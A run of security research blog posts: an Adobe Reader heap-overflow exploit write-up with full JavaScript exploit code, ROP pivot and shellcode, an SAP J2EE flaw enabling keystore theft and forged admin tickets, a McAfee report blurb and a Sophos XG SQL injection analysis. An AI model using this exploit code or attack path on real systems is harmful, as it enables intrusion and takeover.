  • Data Execution Prevention (DEP)
  • Control Flow Guard (CFG)
  • Sandbox Bypass

The exploit does not bypass the following protection mechanisms:

  • Adobe Sandbox protection: Sandbox protection must be disabled in Adobe Reader for this exploit to work. This may be done from Adobe Reader user interface by unchecking the Enable Protected Mode at Startup option found in Preferences -> Security (Enhanced)
  • Control Flow Guard (CFG): CFG must be disabled in the Windows machine for this exploit to work. This may be done from the Exploit Protection settings of Windows 10, setting the Control Flow Guard (CFG) option to Off by default.

In order to exploit this vulnerability bypassing ASLR and DEP, the following strategy is adopted:

  1. Prepare the heap layout to allow controlling the memory areas adjacent to the allocations made for the base URL and the relative URL. This involves performing enough allocations to activate the Low Fragmentation Heap bucket for the two sizes, and enough allocations to entirely fit a UserBlock. The allocations with the same size as the base URL allocation must contain an ArrayBuffer object, while the allocations with the same size as the relative URL must have the data required to overwrite the byteLength field of one of those ArrayBuffer objects with the value 0xffff.
  2. Poke some holes on the UserBlock by nullifying the reference to some of the recently allocated memory chunks.
  3. Trigger the garbage collector to free the memory chunks referenced by the nullified objects. This provides room for the base URL and relative URL allocations.
  4. Trigger the heap buffer overflow vulnerability, so the data in the memory chunk adjacent to the relative URL will be copied to the memory chunk adjacent to the base URL.
  5. If everything worked, step 4 should have overwritten the byteLength of one of the controlled ArrayBuffer objects. When a DataView object is created on the corrupted ArrayBuffer it is possible to read and write memory beyond the underlying allocation. This provides a precise way of overwriting the byteLength of the next ArrayBuffer with the value 0xffffffff. Creating a DataView object on this last ArrayBuffer allows reading and writing memory arbitrarily, but relative to where the ArrayBuffer is.
  6. Using the R/W primitive built, walk the NT Heap structure to identify the BusyBitmap.Buffer pointer. This allows knowing the absolute address of the corrupted ArrayBuffer and build an arbitrary read and write primitive that allows reading from and writing to absolute addresses.
  7. To bypass DEP it is required to pivot the stack to a controlled memory area. This is done by using a ROP gadget that writes a fixed value to the ESP register.
  8. Spray the heap with ArrayBuffer objects with the correct size so they are adjacent to each other. This should place a controlled allocation at the address pointed by the stack-pivoting ROP gadget.
  9. Use the arbitrary read and write to write shellcode in a controlled memory area, and to write the ROP chain to execute VirtualProtect to enable execution permissions on the memory area where the shellcode was written.
  10. Overwrite a function pointer of the DataView object used in the read and write primitive and trigger its call to hijack the execution flow.

The following sub-sections break down the exploit code with explanations for better understanding.

Preparing the Heap Layout

The size of the strings involved in this vulnerability can be controlled. This is convenient since it allows selecting the right size for each of them so they are handled by the Low Fragmentation Heap. The inner workings of the Low Fragmentation Heap (LFH) can be leveraged to increase the determinism of the memory layout required to exploit this vulnerability. Selecting a size that is not used in the program allows full control to activate the LFH bucket corresponding to it, and perform the exact number of allocations required to fit one UserBlock.

The memory chunks within a UserBlock are returned to the user randomly when an allocation is performed. The ideal layout required to exploit this vulnerability is having free chunks adjacent to controlled chunks, so when the strings required to trigger the vulnerability are allocated they fall in one of those free chunks.

In order to set up such a layout, 0xd+0x11 ArrayBuffers of size 0x2608-0x10-0x8 are allocated. The first 0x11 allocations are used to enable the LFH bucket, and the next 0xd allocations are used to fill a UserBlock (note that the number of chunks in the first UserBlock for that bucket size is not always 0xd, so this technique is not 100% effective). The ArrayBuffer size is selected so the underlying allocation is of size 0x2608 (including the chunk metadata), which corresponds to an LFH bucket not used by the application.

Then, the same procedure is done but allocating strings whose underlying allocation size is 0x2408, instead of allocating ArrayBuffers. The number of allocations to fit a UserBlock for this size can be 0xe.

The strings should contain the bytes required to overwrite the byteLength property of the ArrayBuffer that is corrupted once the vulnerability is triggered. The value that will overwrite the byteLength property is 0xffff. This does not allow leveraging the ArrayBuffer to read and write to the whole range of memory addresses in the process. Also, it is not possible to directly overwrite the byteLength with the value 0xffffffff since it would require overwriting the pointer of its DataView object with a non-zero value, which would corrupt it and break its functionality. Instead, writing only 0xffff allows avoiding overwriting the DataView object pointer, keeping its functionality intact since the leftmost two null bytes would be considered the Unicode string terminator during the concatenation operation.

function massageHeap() {

[1]

    var arrayBuffers = new Array(0xd+0x11);
    for (var i = 0; i < arrayBuffers.length; i++) {
        arrayBuffers[i] = new ArrayBuffer(0x2608-0x10-0x8);
        var dv = new DataView(arrayBuffers[i]);
    }

[2]

    var holeDistance = (arrayBuffers.length-0x11) / 2 - 1;
    for (var i = 0x11; i <= arrayBuffers.length; i += holeDistance) {
        arrayBuffers[i] = null;
    }


[3]

    var strings = new Array(0xe+0x11);
    var str = unescape('%u9090%u4140%u4041%uFFFF%u0000') + unescape('%0000%u0000') + unescape('%u9090%u9090').repeat(0x2408);
    for (var i = 0; i < strings.length; i++) {
        strings[i] = str.substring(0, (0x2408-0x8)/2 - 2).toUpperCase();
    }


[4]

    var holeDistance = (strings.length-0x11) / 2 - 1;
    for (var i = 0x11; i <= strings.length; i += holeDistance) {
        strings[i] = null;
    }

    return arrayBuffers;
}

In the listing above, the ArrayBuffer allocations are created in [1]. Then in [2] two pointers to the created allocations are nullified in order to attempt to create free chunks surrounded by controlled chunks.

At [3] and [4] the same steps are done with the allocated strings.

Triggering the Vulnerability

Triggering the vulnerability is as easy as calling the app.launchURL JavaScript function. Internally, the relative URL provided as a parameter is concatenated to the base URL defined in the PDF document catalog, thus executing the vulnerable function explained in the *Code Analysis* section of this document.

function triggerHeapOverflow() {
    try {
        app.launchURL('bb' + 'a'.repeat(0x2608 - 2 - 0x200 - 1 -0x8));
    } catch(err) {}
}

The size of the allocation holding the relative URL string must be the same as the one used when preparing the heap layout so it occupies one of the freed spots, and ideally having a controlled allocation adjacent to it.

Obtaining an Arbitrary Read / Write Primitive

When the proper heap layout is successfully achieved and the vulnerability has been triggered, an ArrayBuffer byteLength property would be corrupted with the value 0xffff. This allows writing past the boundaries of the underlying memory allocation and overwriting the byteLength property of the next ArrayBuffer. Finally, creating a DataView object on this last corrupted buffer allows to read and write to the whole memory address range of the process in a relative manner.

In order to be able to read from and write to absolute addresses the memory address of the corrupted ArrayBuffer must be obtained. One way of doing it is to leverage the NT Heap metadata structures to leak a pointer to the same structure. It is relevant that the chunk header contains the chunk number and that all the chunks in a UserBlock are consecutive and adjacent. In addition, the size of the chunks are known, so it is possible to compute the distance from the origin of the relative read and write primitive to the pointer to leak. In an analogous manner, since the distance is known, once the pointer is leaked the distance can be subtracted from it to obtain the address of the origin of the read and write primitive.

The following function implements the process described in this subsection.

function getArbitraryRW(arrayBuffers) {

[1]

    for (var i = 0; i < arrayBuffers.length; i++) {
        if (arrayBuffers[i] != null && arrayBuffers[i].byteLength == 0xffff) {
            var dv = new DataView(arrayBuffers[i]);
            dv.setUint32(0x25f0+0xc, 0xffffffff, true);
        }
    }

[2]

    for (var i = 0; i < arrayBuffers.length; i++) {
        if (arrayBuffers[i] != null && arrayBuffers[i].byteLength == -1) {
            var rw = new DataView(arrayBuffers[i]);
            corruptedBuffer = arrayBuffers[i];
        }
    }

[3]

    if (rw) {
        var chunkNumber = rw.getUint8(0xffffffff+0x1-0x13, true);
        var chunkSize = 0x25f0+0x10+8;

        var distanceToBitmapBuffer = (chunkSize * chunkNumber) + 0x18 + 8;
        var bitmapBufferPtr = rw.getUint32(0xffffffff+0x1-distanceToBitmapBuffer, true);

        startAddr = bitmapBufferPtr + distanceToBitmapBuffer-4;
        return rw;
    }
    return rw;
}

The function above at [1] tries to locate the initial corrupted ArrayBuffer and leverages it to corrupt the adjacent ArrayBuffer. At [2] it tries to locate the recently corrupted ArrayBuffer and build the relative arbitrary read and write primitive by creating a DataView object on it. Finally, at [3] the aforementioned method of obtaining the absolute address of the origin of the relative read and write primitive is implemented.

Once the origin address of the read and write primitive is known it is possible to use the following helper functions to read and write to any address of the process that has mapped memory.

function readUint32(dataView, absoluteAddress) {
    var addrOffset = absoluteAddress - startAddr;
    if (addrOffset < 0) {
        addrOffset = addrOffset + 0xffffffff + 1;
    }
    return dataView.getUint32(addrOffset, true);
}

function writeUint32(dataView, absoluteAddress, data) {
    var addrOffset = absoluteAddress - startAddr;
    if (addrOffset < 0) {
        addrOffset = addrOffset + 0xffffffff + 1;
    }
    dataView.setUint32(addrOffset, data, true);
}

Spraying ArrayBuffer Objects

The heap spray technique performs a large number of controlled allocations with the intention of having adjacent regions of controllable memory. The key to obtaining adjacent memory regions is to make the allocations of a specific size.

In JavaScript, a convenient way of making allocations in the heap whose content is completely controlled is by using ArrayBuffer objects. The memory allocated with these objects can be read from and written to with the use of DataView objects.

In order to get the heap allocation of the right size the metadata of ArrayBuffer objects and heap chunks have to be taken into consideration. The internal representation of ArrayBuffer objects tells that the size of the metadata is 0x10 bytes. The size of the metadata of a busy heap chunk is 8 bytes.

Since the objective is to have adjacent memory regions filled with controlled data, the allocations performed must have the exact same size as the heap segment size, which is 0x10000 bytes. Therefore, the ArrayBuffer objects created during the heap spray must be of 0xffe8 bytes.

function sprayHeap() {
    var heapSegmentSize = 0x10000;

[1]

    heapSpray = new Array(0x8000);
    for (var i = 0; i < 0x8000; i++) {
        heapSpray[i] = new ArrayBuffer(heapSegmentSize-0x10-0x8);
        var tmpDv = new DataView(heapSpray[i]);
        tmpDv.setUint32(0, 0xdeadbabe, true);
    }
}

The exploit function listed above performs the ArrayBuffer spray. The total size of the spray defined in [1] was determined by setting a number high enough so an ArrayBuffer would be allocated at the selected predictable address defined by the stack pivot ROP gadget used.

These purpose of these allocations is to have a controllable memory region at the address were the stack is relocated after the execution of the stack pivoting. This area can be used to prepare the call to VirtualProtect to enable execution permissions on the memory page were the shellcode is written.

Hijacking the Execution Flow and Executing Arbitrary Code

With the ability to arbitrarily read and write memory, the next steps are preparing the shellcode, writing it, and executing it. The security mitigations present in the application determine the strategy and techniques required. ASLR and DEP force using Return Oriented Programming (ROP) combined with leaked pointers to the relevant modules.

Taking this into account, the strategy can be the following:

  1. Obtain pointers to the relevant modules to calculate their base addresses.
  2. Pivot the stack to a memory region under our control where the addresses of the ROP gadgets can be written.
  3. Write the shellcode.
  4. Call VirtualProtect to change the shellcode memory region permissions to allow  execution.
  5. Overwrite a function pointer that can be called later from JavaScript.

The following functions are used in the implementation of the mentioned strategy.

[1]

function getAddressLeaks(rw) {
    var dataViewObjPtr = rw.getUint32(0xffffffff+0x1-0x8, true);

    var escriptAddrDelta = 0x275518;
    var escriptAddr = readUint32(rw, dataViewObjPtr+0xc) - escriptAddrDelta;

    var kernel32BaseDelta = 0x273eb8;
    var kernel32Addr = readUint32(rw, escriptAddr + kernel32BaseDelta);

    return [escriptAddr, kernel32Addr];
}
 
[2]

function prepareNewStack(kernel32Addr) {

    var virtualProtectStubDelta = 0x20420;
    writeUint32(rw, newStackAddr, kernel32Addr + virtualProtectStubDelta);

    var shellcode = [0x0082e8fc, 0x89600000, 0x64c031e5, 0x8b30508b, 0x528b0c52, 0x28728b14, 0x264ab70f, 0x3cacff31,
        0x2c027c61, 0x0dcfc120, 0xf2e2c701, 0x528b5752, 0x3c4a8b10, 0x78114c8b, 0xd10148e3, 0x20598b51,
        0x498bd301, 0x493ae318, 0x018b348b, 0xacff31d6, 0x010dcfc1, 0x75e038c7, 0xf87d03f6, 0x75247d3b,
        0x588b58e4, 0x66d30124, 0x8b4b0c8b, 0xd3011c58, 0x018b048b, 0x244489d0, 0x615b5b24, 0xff515a59,
        0x5a5f5fe0, 0x8deb128b, 0x8d016a5d, 0x0000b285, 0x31685000, 0xff876f8b, 0xb5f0bbd5, 0xa66856a2,
        0xff9dbd95, 0x7c063cd5, 0xe0fb800a, 0x47bb0575, 0x6a6f7213, 0xd5ff5300, 0x636c6163, 0x6578652e,
        0x00000000]


[3]

    var shellcode_size = shellcode.length * 4;
    writeUint32(rw, newStackAddr + 4 , startAddr);
    writeUint32(rw, newStackAddr + 8, startAddr);
    writeUint32(rw, newStackAddr + 0xc, shellcode_size);
    writeUint32(rw, newStackAddr + 0x10, 0x40);
    writeUint32(rw, newStackAddr + 0x14, startAddr + shellcode_size);

[4]

    for (var i = 0; i < shellcode.length; i++) {
        writeUint32(rw, startAddr+i*4, shellcode[i]);
    }

}

function hijackEIP(rw, escriptAddr) {
    var dataViewObjPtr = rw.getUint32(0xffffffff+0x1-0x8, true);

    var dvShape = readUint32(rw, dataViewObjPtr);
    var dvShapeBase = readUint32(rw, dvShape);
    var dvShapeBaseClasp = readUint32(rw, dvShapeBase);

    var stackPivotGadgetAddr = 0x2de29 + escriptAddr;

    writeUint32(rw, dvShapeBaseClasp+0x10, stackPivotGadgetAddr);

    var foo = rw.execFlowHijack;
}

In the code listing above, the function at [1] obtains the base addresses of the EScript.api and kernel32.dll modules, which are the ones required to exploit the vulnerability with the current strategy. The function at [2] is used to prepare the contents of the relocated stack, so that once the stack pivot is executed everything is ready. In particular, at [3] the address to the shellcode and the parameters to VirtualProtect are written. The address to the shellcode corresponds to the return address that the ret instruction of the VirtualProtect will restore, redirecting this way the execution flow to the shellcode. The shellcode is written at [4].

Finally, at [5] the getProperty function pointer of a DataView object under control is overwritten with the address of the ROP gadget used to pivot the stack, and a property of the object is accessed which triggers the execution of getProperty.

The stack pivot gadget used is from the EScript.api module, and is listed below:

0x2382de29: mov esp, 0x5d0013c2; ret;

When the instructions listed above are executed, the stack will be relocated to 0x5d0013c2 where the previously prepared allocation would be.

Conclusion

We hope you enjoyed reading this analysis of a heap buffer-overflow and learned something new. If you’re hungry for more, go and checkout our other blog posts!

The post Analysis of a Heap Buffer-Overflow Vulnerability in Adobe Acrobat Reader DC appeared first on Exodus Intelligence.

McAfee Labs Report Highlights Ransomware Threats

24 June 2021 at 04:01

The McAfee Advanced Threat Research team today published the McAfee Labs Threats Report: June 2021.

In this edition we introduce additional context into the biggest stories dominating the year thus far including recent ransomware attacks. While the topic itself is not new, there is no question that the threat is now truly mainstream.

This Threats Report provides a deep dive into ransomware, in particular DarkSide, which resulted in an agenda item in talks between U.S. President Biden and Russian President Putin. While we have no intention of detailing the political landscape, we certainly do have to acknowledge that this is a threat disrupting our critical services. Furthermore, adversaries are supported within an environment that make digital investigations challenging with legal barriers that make the gathering of digital evidence almost impossible from certain geographies.

That being said, we can assure the reader that all of the recent campaigns are incorporated into our products, and of course can be tracked within our MVISION Insights preview dashboard.

This dashboard shows that – beyond the headlines – many more countries have experienced such attacks. What it will not show is that victims are paying the ransoms, and criminals are introducing more Ransomware-as-a-Service (RaaS) schemes as a result. With the five-year anniversary of the launch of the No More Ransom initiative now upon us it’s fair to say that we need more global initiatives to help combat this threat.

Q1 2021 Threat Findings

McAfee Labs threat research during the first quarter of 2021 include:

  • New malware samples averaging 688 new threats per minute
  • Coin Miner threats surged 117%
  • New Mirai malware variants drove increase in Internet of Things and Linux threats

Additional Q1 2021 content includes:

  • McAfee Global Threat Intelligence (GTI) queries and detections
  • Disclosed Security Incidents by Continent, Country, Industry and Vectors
  • Top MITRE ATT&CK Techniques APT/Crime

We hope you enjoy this Threats Report. Don’t forget to keep track of the latest campaigns and continuing threat coverage by visiting our McAfee Threat Center. Please stay safe.

The post McAfee Labs Report Highlights Ransomware Threats appeared first on McAfee Blog.

About the Unsuccessful Quest for a Deserialization Gadget (or: How I found CVE-2021-21481)

11 June 2021 at 10:05
This blog post describes the research on SAP J2EE Engine 7.50 I did between October 2020 and January 2021. The first part describes how I set off to find a pure SAP deserialization gadget, which would allow to leverage SAP's P4 protocol for exploitation, and how that led me, by sheer coincidence, to an entirely unrelated, yet critical vulnerability, which is outlined in part two.

The reader is assumed to be familiar with Java Deserialization and should have a basic understanding of Remote Method Invocation (RMI) in Java.

Prologue

It was in 2016 when I first started to look into the topic of Java Exploitation, or, more precisely: into exploitation of unsafe deserialization of Java objects. Because of my professional history, it made sense to have a look at an SAP product that was written in Java. Naturally, the P4 protocol of SAP NetWeaver Java caught my attention since it is an RMI-like protocol for remote administration, similar to Oracle WebLogic's T3. In May 2017, I published a blog post about an exploit that was getting RCE by using the Jdk7u21 gadget. At that point, SAP had already provided a fix long ago. Since then, the subject has not left me alone. While there were new deserialization gadgets for Oracle's Java server product almost every month, it surprised me no one ever heard of an SAP deserialization gadget with comparable impact. Even more so, since everybody who knows SAP software knows the vast amount of code they ship with each of their products. It seemed very improbable to me that they would be absolutely immune against the most prominent bug class in the Java world of the past six years. In October 2020 I finally found the time and energy to set off for a new hunt. To my great disappointment, the search was in the end not successful. A gadget that yields RCE similar to the ones from the famous ysoserial project is still not in sight. However in January, I found a completely unprotected RMI call that in the end yielded administrative access to the J2EE Engine. Besides the fact that it can be invoked through P4 it has nothing in common with the deserialization topic. Even though a mere chance find, it is still highly critical and allows to compromise the security of the underlying J2EE server.

The bug was filed as CVE-2021-21481. On march 9th 2021, SAP provided a fix. SAP note 3224022 describes the details.

P4 and JNDI

Listing 1 shows a small program that connects to a SAP J2EE server using P4: The only hint that this code has something to do with a proprietary protocol called P4 is the URL that starts with P4://. Other than that, everything is encapsulated by P4 RMI calls (for those who want to refresh their memory about JNDI). Furthermore, it is not obvious that what is going on behind the scenes has something to do with RMI. However, if you inspect more closely the types of the involved Java objects, you'll find that keysMngr is of type com.sun.proxy.$Proxy (implementing interface KeystoreManagerWrapper) and keysMngr.getKeystore() is a plain vanilla RMI-call. The argument (the name of the keystore to be instantiated) will be serialized and sent to the server which will return a serialized keystore object (in this case it won't because there is no keystore "whatever"). Also not obvious is that the instantiation of the InitialContext requires various RMI calls in the background, for example the instantiation of a RemoteLoginContext object that will allow to process the login with the provided credentials.

Each of these RMI calls would in theory be a sink to send a deserialization gadget to. In the exploit I mentioned above, one of the first calls inside new InitialContext() was used to send the Jdk7u21 gadget (instead of a java.lang.String object, by the way).

Now, since the Jdk7u21 gadget is not available anymore and I was looking for a gadget consisting merely of SAP classes, I had to struggle with a very annoying limitation: The classloader segmentation. SAP J2EE knows various types of software components: interfaces, services, libraries and applications (which can consist of web applications and EJBs). When you deploy a component, you have to declare the dependencies to other components your component relies upon. Usually, web applications depend on 2-3 services and libraries which will have a couple of dependencies to other services and libraries, as well. At the bottom of this dependency chain are the core components.

Now, the limitation I was talking about is the fact that the dependency management greatly affects which classes a component can see: It can precisely see all classes of all components it relies upon (plus of course JDK classes) but not more. If your class ships as part of the keystore service above, it will only be able to resolve classes from components the keystore service declares as dependencies.

Figure 1: dependencies of the keystore service with all child and parent classloaders

This has dramatic consequences for gadget development. Suppose you found a gadget whose classes come from components X, Y and Z but there are no dependencies between these components and in addition, there is no component which depends on all of them. Then, no matter in which classloader context your gadget will be deserialized, at least one of X, Y or Z will be missing in the classpath and the deserialization will end up in a ClassNotFoundException. By using a similar approach to the one described in the GadgetProbe project I found out that at the point the Jdk7u21 gadget was deserialized in the above mentioned exploit, there were only about 160 non-JDK classes visible that implement java.io.Serializable. Not ideal for building an exploit. Going back to listing 1, in case we send a gadget instead of the string "whatever", we can tell from figure 1 that classes from ten components (the ones listed beneath "Direct parent loaders") will be in the class path. Code that sends an arbitrary serializable object instead of the string "whatever" could e.g. look like this (instead of keysMgr.getKeystore()): If there was a gadget, one could send it with out.writeObject().

With this approach, the critical mass of accessible serializable classes can be significantly increased. The telnet interface of SAP J2EE provides useful information about the services and their dependencies.

Regardless of the classloader challenge, I was eager to get an overview of how many serializable classes existed in the server. The number of classes in the core layer, services and libraries amounts to roughly 100,000, and this does not even count application code. I quickly realized that I needed something smarter than the analysis features of Eclipse to handle such volumes. So I developed my own tool which analyses Java bytecode using the OW2 ASM Framwork. It writes object and interface inheritance dependencies, methods, method calls and attributes to a SQLite DB. It turned out that out of the 100,000 classes, about 16,000 implemented java.io.Serializable. The RDBMS approach was pretty handy since it allowed build complex queries like

Give classes which are Serializable and Cloneable which implement private void readObject(java.io.ObjectInputStream) and whose toString() method exists and has more than five calls to distinct other methods

This question translates to

The work on this tool and also the process of constantly inventing new and original queries to find potentially interesting classes was great fun. Unfortunately, it was also in vain. There is a library, which almost allowed to build a wonderful chain from a toString() call to the ubiquitous TemplatesImpl.getOutputProperties(), but the API provided by the library is so very complex and undocumented that, after two months, I gave up in total frustration. There were some more small findings which don't really deserve to be mentioned. However, I'd like to elaborate on one more thing before I'll start part two of the blog post, that covers the real vulnerability.

One of the first interesting classes I discovered performs a JNDI lookup with an attacker controlled URL in private void readObject(java.io.ObjectInputStream). What would have been a direct hit four years ago could at least have been a respectable success in 2020. Remember: Oracle JRE finally switched off remote classloading when resolving LDAP references in 2019 in version JRE 1.8.0_191. Had this been exploitable, it would have opened up an attack avenue at least for systems with outdated JRE. My SAP J2EE was running on top of a JRE version 1.8.0_51 from 2015, so the JNDI injection should have worked, but, to my great surprise, it didn't. The reason can be found in the method getObjectInstance of javax.naming.spi.DirectoryManager: The hightlighted call to getObjectFactoryFromReference is where an attacker needs to get to. The method resolves the JNDI reference using an URLClassLoader and an attacker-supplied codebase. However, as one can easily see, if getObjectFactoryBuilder() returns a non-null object the code returns in either of the two branches of the following if-clause and the call to getObjectFactoryFromReference below is never reached. And that is exactly what happens. SAP J2EE registers an ObjectFactoryBuilder of type com.sap.engine.system.naming.provider.ObjectFactoryBuilderImpl. This class will try to find a factory class based on the factoryName-attribute and completely ignore the codebase-attribute of the JNDI reference. Bottom line is that JNDI injection might never have worked in SAP J2EE, which would eliminate one of the most important attack primitives in the context of Java Deserialization attacks.

CVE-2021-21481

After digressing about how I searched for deserialization gadgets, I'd like to cover the real vulnerability now, which has absolutely nothing to do with Java Deserialization. It is a plain vanilla instance of CWE-749: Exposed Dangerous Method or Function. Let's go back to Listing 1. We can see that the JNDI context allows to query interfaces by name, in our example we were querying the KeyStoreManager interface by the name "keystore". On several occasions, I had already tried to find an available rich client for SAP J2EE Engine administration that uses P4. Every time I was unsuccessful, I believed such a client did not officially exist, or at least was not at everyone's disposal.

However, whenever you install a SAP J2EE Engine, the P4 port is enabled by default and listening on the same network interface as the HTTP(s) services. Because I was totally focussing on Deserialization, for a long time I was oblivious how much information one can glean through the JNDI context. E.g. it is trivial to get all bindings: The list() call allows to simply iterate through all bindings:

Interesting items are proxy objects and the _Stub objects. E.g. the proxy for messaging.system.MonitorBean can be cast to com.sap.engine.messaging.app.MonitorHI.

During debugging of the server, I had already encountered the class JUpgradeIF_Stub, long before I executed the call from Listing 5. The class has a method openCfg(String path) and it was not difficult to establish that the server version of the call didn't perform any authorization check. This one definitively looked fishy to me, but since I wasn't looking for unprotected RMI calls I put the finding into the box with the label "check on a rainy sunday afternoon when the kids are busy with someone else". But then, eventually, I did check it. It didn't take long to realize that I had found a huge problem. Compare Listing 6. The configuration settings of SAP J2EE Engine are organized in a hierarchical structure. The location of an object can be specified by a path, pretty much like a path of a file in the file system. The above code gets a reference to the JUpgradeIF_Stub by querying the JNDI context with name "MigrationService", gets an instance of a Configuration object by a call to openCfg() and then walks down the path to the leaf node. The element found there can be exported to an archive that is stored in the file system of the server (call to export(String path)). If carefully chosen, the local path on the server will point to a root folder of a web application. There, download.zip can simply be downloaded through HTTP. If you want to check for yourself, the UME configuration is stored at cluster_config/system/custom_global/cfg/services/com.sap.security.core.ume.service/properties.

You'd probably say "hey! I need to be Administrator to do that! Where's the harm?". Right, I thought so, too. But neither do you need to be Administrator, nor do you even have to be authenticated. The following code works perfectly fine: So does the enumeration using ctxt.list() from Listing 5. The fact that authentication is not needed at this point is not new at all by the way, compare CVE-2017-5372.

However, you will get a permission exception when calling keysMngr.getKeystore() (because getKeystore() does have a permission check). But JUpgradeIF.openCfg() was missing the check until SAP fixed it.

At this point, even without SAP specific knowledge an attacker can cause significant harm. E.g. flood the server's file system with archives causing a resource exhaustion DoS condition.

With a little insider knowledge one can get admin access. In the configuration tree, there is a keystore called TicketKeystore. Its cryptographic key pair is used to sign SAP Logon Tickets. If you steal the keystore, you can issue a ticket for the Administrator user and log on with full admin rights. There are also various other keystores, e.g. for XML signatures and the like (let alone the fact that there is tons of stuff in this store. No one probably knows all the security sensitive things you can get access to ...)

This information should be sufficient to the understanding of CVE-2021-21481. The exact location of the keystores in the configuration and the relative local path in order to download the archive by HTTP are left as an exercise to the reader.

Sophos XG - A Tale of the Unfortunate Re-engineering of an N-Day and the Lucky Find of a 0-Day

On April 25, 2020, Sophos published a knowledge base article (KBA) 135412 which warned about a pre-authenticated SQL injection (SQLi) vulnerability, affecting the XG Firewall product line. According to Sophos this issue had been actively exploited at least since April 22, 2020. Shortly after the knowledge base article, a detailed analysis of the so called Asnarök operation was published. Whilst the KBA focused solely on the SQLi, this write up clearly indicated that the attackers had somehow extended this initial vector to achieve remote code execution (RCE).

The criticality of the vulnerability prompted us to immediately warn our clients of the issue. As usual we provided lists of exposed and affected systems. Of course we also started an investigation into the technical details of the vulnerability. Due to the nature of the affected devices and the prospect of RCE, this vulnerability sounded like a perfect candidate for a perimeter breach in upcoming red team assessments. However, as we will explain later, this vulnerability will most likely not be as useful for this task as we first assumed.

Our analysis not only resulted in a working RCE exploit for the disclosed vulnerability (CVE-2020-12271) but also led to the discovery of another SQLi, which could have been used to gain code execution (CVE-2020-15504). The criticality of this new vulnerability is similar to the one used in the Asnarök campaign: exploitable pre-authentication either via an exposed user or admin portal. Sophos quickly reacted to our bug report, issued hotfixes for the supported firmware versions and released new firmware versions for v17.5 and v18.0 (see also the Sophos Community Advisory).


I am Groot

The lab environment setup will not be covered in full detail since it is pretty straight forward to deploy a virtual XG firewall. Appropriate firmware ISOs can be obtained from the official download portal. What is notable is the fact that the firmware allows administrators direct root shell access via the serial interface, the TelnetConsole.jsp in the web interface or the SSH server. Thus there was no need to escape from any restricted shells or to evade other protection measures in order to start the analysis.

Device Management -> Advanced Shell -> /bin/sh as root.

After getting familiar with the filesystem layout, exposed ports and running processes we suddenly noticed a message in the XG control center informing us that a hotfix for the n-day vulnerability, we were investigating, had automatically been applied.

Control Center after the automatic installation of the hotfix (source).

We leveraged this behavior to create a file-system snapshot before and after the hotfix. Unfortunately diffing the web root folders in both snapshots (aiming for a quick win) resulted in only one changed file with no direct indication of a fixed SQL operation.

Architecture

In order to understand the hotfix, it was necessary to delve deep into the underlying software architecture. As the published information indicated that the issue could be triggered via the web interface we were especially interested in how incoming HTTP requests were processed by the appliance.

Both web interfaces (user and admin) are based on the same Java code served by a Jetty server behind an Apache server.

Jetty server on port 8009 serving /usr/share/webconsole.

Most interface interactions (like a login attempt) resulted in a HTTP POST request to the endpoint /webconsole/Controller. Such a request contained at least two parameters: mode and json. The former specified a number which was mapped internally to a function that should be invoked. The latter specified the arguments for this function call.

Login request sent to /webconsole/Controller via XHR.

The corresponding Servlet checked if the requested function required authentication, performed some basic parameter validation (code was dependent on the called function) and transmitted a message to another component - CSC.

This message followed a custom format and was sent via either UDP or TCP to port 299 on the local machine (the firewall). The message contained a JSON object which was similar but not identical to the json parameter provided in the initial HTTP request.

JSON object sent to CSC on port 299.

The CSC component (/usr/bin/csc) appeared to be written in C and consisted of multiple sub modules (similar to a busybox binary). To our understanding this binary is a service manager for the firewall as it contained, started and controlled several other jobs. We encountered a similar architecture during our Fortinet research.

Multiple different processes spawned by the CSC binary.

CSC parsed the incoming JSON object and called the requested function with the provided parameters. These functions however, were implemented in Perl and were invoked via the Perl C language interface. In order to do so, the binary loaded and decrypted an XOR encrypted file (cscconf.bin) which contained various config files and Perl packages.

Another essential part of the architecture were the different PostgreSQL database instances which were used by the web interface, the CSC and the Perl logic, simultaneously.

The three PostgreSQL databases utilized by the appliance.
High level overview of the architecture.

Locating the Perl logic

As mentioned earlier, the Java component forwarded a modified version of the JSON parameter (found in the HTTP request) to the CSC binary. Therefore we started by having a closer look at this file. A disassembler helped us to detect the different sub modules which were distributed across several internal functions, but did not reveal any logic related to the login request. We did however find plenty of imports related to the Perl C language interface. This led us to the assumption that the relevant logic was stored in external Perl files, even though an intensive search on the filesystem had not returned anything useful. It turned out, that the missing Perl code and various configuration files were stored in the encrypted tar.gz file (/_conf/cscconf.bin) which was decrypted and extracted during the initialization of CSC. The reason why we previously could not locate the decrypted files was that these could only be found in a separate linux namespace.

As can be seen in the screenshot below the binary created a mount point and called the unshare syscall with the flag parameter set to 0x20000. This constant translates to the CLONE_NEWNS flag, which disassociates the process from the initial mount namespace.

For those unfamiliar with Linux namespaces: in general each process is associated with a namespace and can only see, and thus use, the resources associated with that namespace. By detaching itself from the initial namespace the binary ensures that all files created after the unshare syscall are not propagated to other processes. Namespaces are a feature of the Linux kernel and container solutions like docker heavily rely on them.

Calling unshare, to detach from the initial namespace, before extracting the config.

Therefore even within a root shell we were not able to access the extracted archive. Whilst multiple approaches exist to overcome this, the most appealing at that point was to simply patch the binary. This way, it was possible to copy the extracted config to a world-writable path. In hindsight, it would probably have been easier to just scp nsenter to the appliance.

Accessing the decrypted and extracted files by jumping into the namespace of the CSC binary.

From a handful of information to the N-Day (CVE-2020-12271)

The rolled out hotfix boiled down to the modification of one existing function (_send) and the introduction of two new functions (getPreAuthOperationList and addEventAndEntityInPayload) in the file /usr/share/webconsole/WEB-INF/classes/cyberoam/corporate/CSCClient.class.

The function getPreAuthOperationList defined all modes which can be called unauthenticated. The function addEventAndEntityInPayload checks if the mode specified in the request is contained in the preAuthOperationsList and removes the Entity and Event keys from the JSON object if that is the case.

Analysis

Based on the hotfix we assumed that the vulnerability must reside within one of the functions specified in the getPreAuthOperationList. However, after browsing through the relevant Perl code in order to find blocks that made use of the Entity or Event key, we were pretty confident that this was not the case.

What we did notice though is that regardless of which mode we specify, every request was processed by the apiInterface function. Sophos denoted the functions mapped to the mode parameter internally as opcodes.

The apiInterface function was also the place where we finally found the SQLi vulnerability aka execution of arbitrary SQL statements. As is depicted in the source excerpt below, this opcode called the executeDeleteQuery function (line 27) which took a SQL statement from the query parameter and ran it against the database.

Unfortunately, in order to reach the vulnerable code, our payload needed to pass every preceding CALL statement which enforced various conditions and properties on our JSON object.

The first call (validateRequestType) required that Entity was not set to securitypolicy and that the request type was ORM after the call.

